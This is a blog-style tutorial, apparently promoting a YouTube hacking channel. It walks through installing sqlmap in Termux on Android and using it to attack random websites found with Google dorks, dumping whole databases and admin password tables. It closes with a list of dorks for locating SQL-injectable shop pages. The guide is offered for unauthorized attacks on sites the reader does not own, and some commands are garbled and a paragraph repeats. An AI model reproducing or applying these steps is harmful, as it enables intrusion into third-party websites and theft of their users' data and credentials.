Here You Can First see the video to how to install the sql injection in termux (Android with or without root ) and also see on YouTube
Our Hacking YouTube channel Link:-https://www.youtube.com/c/vknarola
Hello everyone, Today I am going to show you how to install SQLMAP on Android without root permission and hack website with sql injection. Basically sqlmap is designed for the Linux, and its based on some basic SQL injection vulnerabilities like blind, time-base, error-base etc. I personally found out this trick and brought it for you guys! 
This works with non rooted phones and it won’t need much space to install. Hardly 20mb is needed. So you can use it. Also it doesn’t need any Linux distro and all heavy files you can use it in small phones. Also I personally tested it on many non rooted phone. It is working fine. The basic thing you need is brain Nothing else now! I’m not wasting your precious time more.
This works with non rooted phones and it won’t need much space to install. Hardly 20mb is needed. So you can use it. Also it doesn’t need any Linux distro and all heavy files you can use it in small phones. Also I personally tested it on many non rooted phone. It is working fine. The basic thing you need is brain Nothing else now! I’m not wasting your precious time more.
So let’s start!
Requirements
- Termux(linux terminal contain many inbuilt commands)
- Sqlmap(most important use for sql injection)
- File manager(to view log & db)
- Patience & brain
SQLMAP On Android : Installation
- First install all apps from above link and run it at least once download that sqlmap zip file and extract it in sdcard and change its name
- After that open Termux and run given command
apt update && apt upgrade
- It takes some time to update it will ask that some space is required you want to install simply press y to yes it took a small amount of space to install
- If you are using 6+ android version phone then you need to run this command or if you use lower version you can simply skip it’s not mandatory but I suggest you to run it
termux-setup-storage
- It will ask you to allow permission of using your internal storage to proceed just hit that allow button and go to next step
packages install python2
- This command install python in your termux it ask you that you want to install python enter y for installing python2 in your termux
Let’s Start
- Now all set you just need to find sqlmap.py in your phone and navigate using cd first you need to access root folder so first run
cd /
Then type
cd sdcard cd ls
- It will show you all files now you need to find sqlmap-master(extracted folder)
cd sqlmap-master cd sqlmap-master
- Two times sqlmap-master if you already change name of sqlmap-master to sqlmap then you can run
cd sqlmap cd sqlmap-master
- You can take help of “ls ” command to list down all files on that location
- Navigate to the sqlmap-master folder where the sqlmap.py is stored to run that sqlmap you need following command
- If you see this red color sqlmap then you are done with the installation of sqlmap now next step is hacking the website using sqlmap it you need to find the website with sql vulnerability or you can use simple method inbuilt sqlmap google dork to find website
- If you are using google dork then
python2 sqlmap.py -g your_keyword
- If you want to use direct url then
python2 sqlmap.py -u your_url
- You can refer sqlmap official site for help or just type python2 sqlmap.py -h for basic help python2 sqlmap.py -hh for advance help
- If you want to hack whole site with all database and tables just add -a with python2 sqlmap.py -g your_keyword or with python2 sqlmap.py -u your_url
- In google dork method it will give you three option yes for attacking first site which come in result for selecting it you need to type “y” for skipping to next target you can use “n” and for quite use “q”
Get Set Attack!
- After that it will start attacking on site wait until it finish it may ask you following question just simply hit “y”
- After that it will show you many tables and every thing that sqlmap hacked don’t worry you can view it in log when process done
- Now if you want to see all tables you need to run following command
python2 sqlmap.py -u url --tables
- It will return all tables name that already hacked by sqlmap now choose the table you want to view by simply entering following command in my case I want to view the admin table to view password so I run
python2 sqlmap.py -u url -T your_table name
- This command will save your table data and log file in root folder which is not accessible to normal non rooted phone but no worry we have solution this terminal can access so we are going to copy this file to your internal storage for view it with non rooted phone also
cp source //sdcard
- Just replace the source with source given by terminal in above command it will omit the dump file but don’t worry we don’t need it now navigate to the file using your inbuilt file manager or use ES file manager
- Congo! You successfully hacked a website using sqlmap with sql injection on Android.
Dorks
I’m giving below some important dorks here, so you can find SQL vulnerable sites easily!
add-to-cart.php?ID= addToCart.php?idProduremember
tomylist.php?ProdId=
adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id=
